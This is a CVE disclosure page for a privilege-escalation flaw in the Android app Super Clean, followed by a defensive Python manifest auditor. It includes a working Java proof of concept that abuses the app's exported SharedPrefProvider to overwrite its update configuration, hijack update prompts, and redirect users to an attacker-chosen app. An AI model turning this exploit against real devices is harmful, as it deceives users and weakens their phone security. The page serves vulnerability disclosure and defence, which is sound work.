CVE-2023-27651: SODA/CVE detail.md at main · LianKee/SODA

An issue found in Ego Studio SuperClean v.1.1.9 and v.1.1.5 allows an attacker to gain privileges via the update_info field of the default.xml file.

Escalation of privileges exists in Super Clean (CVE-2023-27651)

Vendor: Ego Studio (http://www.egostudiogroup.com/)

Affected product: Super Clean (com.egostudio.clean)

Version: 1.1.5, 1.1.9

Download link: https://apkpure.com/cn/super-clean-phone-cleaner/com.egostudio.clean/download

Description of the vulnerability for use in the CVE: An issue found in Ego Studio SuperClean v.1.1.9 and v.1.1.5 allows an attacker to gain privileges via the update_info field of the default.xml file.

Additional information: Super Clean is a phone cleaner app for cleaning junk files and optimizing memory usage; it also provides various security-related features such as a Wi-Fi security check and an app lock. On launch, the app loads its SharedPreferences files into memory and uses their contents in several important functions. If a malicious app modifies important data in those SharedPreferences files, Super Clean will not behave properly when it loads that data.

An attacker can use the update() method of the SharedPrefProvider component exported by the app to modify the contents of the app's SharedPreferences files. The file 'default.xml' contains a key-value pair named key_self_update_config, which records data related to app updates. By changing the 'appver' and 'type' fields in the value, the attacker can force the app to trigger its update function. They can then hijack the hint message shown to the user in the update UI by modifying the 'update_info' field to mislead the user. Finally, by modifying the 'packageName' field, they can arbitrarily choose the link the update button points to. (Note that packageName can only be the name of an application package listed on Google Play.) As a result, users can be induced to download an app chosen by the attacker from the application market.

Attackers can use similar methods to cause a variety of security hazards. For example, they can make a malicious app add itself to the virus-scan whitelist (by modifying the KEY_VIRUS_SCAN_WHITELIST field), force the app to initialize all settings (by modifying the key_init_app_finish field), block ads (by modifying the key_ad_new_user_avoid_time field, which affects the developer's advertising revenue), or control the server URL the victim app will contact (by modifying the key_wifi_safe_net_check_url field). To make matters worse, users cannot fix the problem simply by restarting the app, because the injected data persists in the SharedPreferences files.

PoC:

    import android.content.ContentResolver;
    import android.content.ContentValues;
    import android.net.Uri;

    // Method of a Context subclass (e.g. an Activity) in the calling app.
    public void attack() {
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        // Authority of the exported SharedPrefProvider in Super Clean
        Uri uri = Uri.parse("content://com.egostudio.clean.boost.main.SharedPrefProvider");
        while (true) {
            ContentValues contentValues = new ContentValues();
            // Target SharedPreferences file and key (values as given in the report)
            contentValues.put("file_name", "__default__");
            contentValues.put("type", 4);
            contentValues.put("key", "key_self_update_config");
            // Replacement update-config JSON written into default.xml
            contentValues.put("value", "{\"channel\":\"clean\",\"country\":[\"全部\"],\"appver\":1000,\"enable\":true,\"force_update\":true,\"type\":1002,\"packageName\":\"com.wuxiafield.novastar\",\"jumpurl\":\"https:\\/\\/play.google.com\\/store\\/apps\\/details?id=com.wuxiafield.novastar\",\"interval_time\":6,\"update_info\":[\"hshadhashdsahdhsadhashdhasdhsahdas\"]}");
            contentResolver.update(uri, contentValues, null, null);
        }
    }
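The root cause described above is a ContentProvider that other apps can reach and whose update() path has no permission attached. The following is an added example, not code from the SODA repository or from the vendor: a small Python audit that reads a decoded AndroidManifest.xml and flags every exported provider lacking a read or write permission. It applies the platform rule that a provider without android:exported is exported by default when either minSdkVersion or targetSdkVersion is 16 or lower, which is how a provider can be reachable without anyone having declared it so. The manifest, package name and authorities below are constructed for illustration and do not describe the real app.

```python
"""Audit a decoded AndroidManifest.xml for ContentProviders reachable by other apps."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def android_attr(name):
    """Return the Clark-notation key ElementTree uses for an android: attribute."""
    return "{%s}%s" % (ANDROID_NS, name)


# Constructed sample manifest (not from any real app). It mirrors the shape of
# the problem on this page: a SharedPreferences-backed provider with neither
# android:exported nor any permission attribute, in an app whose minSdkVersion
# is 16, so the platform exports it by default.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.cleaner">
  <uses-sdk android:minSdkVersion="16" android:targetSdkVersion="30"/>
  <application>
    <provider android:name=".boost.main.SharedPrefProvider"
              android:authorities="com.example.cleaner.boost.main.SharedPrefProvider"/>
    <provider android:name=".FileProvider"
              android:authorities="com.example.cleaner.files"
              android:exported="true"
              android:writePermission="com.example.cleaner.WRITE_FILES"/>
    <provider android:name=".InternalProvider"
              android:authorities="com.example.cleaner.internal"
              android:exported="false"/>
  </application>
</manifest>
"""


def sdk_levels(root):
    """Return (minSdkVersion, targetSdkVersion) from <uses-sdk>, defaulting to 1."""
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is None:
        return 1, 1
    min_sdk = int(uses_sdk.get(android_attr("minSdkVersion"), "1"))
    target_sdk = int(uses_sdk.get(android_attr("targetSdkVersion"), str(min_sdk)))
    return min_sdk, target_sdk


def provider_is_exported(provider, min_sdk, target_sdk):
    """Platform default: a <provider> with no android:exported attribute is
    exported when either minSdkVersion or targetSdkVersion is 16 or lower."""
    explicit = provider.get(android_attr("exported"))
    if explicit is not None:
        return explicit.strip().lower() == "true"
    return min_sdk <= 16 or target_sdk <= 16


def audit_providers(manifest_xml):
    """Return one finding per exported provider whose read or write path has no
    permission. android:permission guards both directions; readPermission and
    writePermission take precedence for their own direction."""
    # The stdlib parser is fine for this constructed input; for manifests pulled
    # from untrusted APKs, parse with defusedxml instead.
    root = ET.fromstring(manifest_xml)
    min_sdk, target_sdk = sdk_levels(root)
    findings = []
    for provider in root.iter("provider"):
        if not provider_is_exported(provider, min_sdk, target_sdk):
            continue
        both = provider.get(android_attr("permission"))
        read_perm = provider.get(android_attr("readPermission")) or both
        write_perm = provider.get(android_attr("writePermission")) or both
        unguarded = [side for side, perm in (("read", read_perm), ("write", write_perm)) if not perm]
        if unguarded:
            findings.append({
                "name": provider.get(android_attr("name")),
                "authority": provider.get(android_attr("authorities")),
                "implicit_export": provider.get(android_attr("exported")) is None,
                "unguarded": unguarded,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_providers(SAMPLE_MANIFEST):
        how = "implicit" if finding["implicit_export"] else "explicit"
        print("%s: exported (%s); unguarded: %s" % (
            finding["authority"], how, ", ".join(finding["unguarded"])))
```

On the sample, the SharedPreferences provider is reported as implicitly exported with both read and write unguarded, and the file provider is reported for its unguarded read side only; the provider marked exported="false" is skipped. A provider that only its own app should write to belongs with android:exported="false"; if it must be shared, every direction it serves needs a permission, and the provider's update() should still validate which files and keys a caller may touch. The binary manifest inside an APK has to be decoded (for example with apktool or androguard) before this check can read it.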
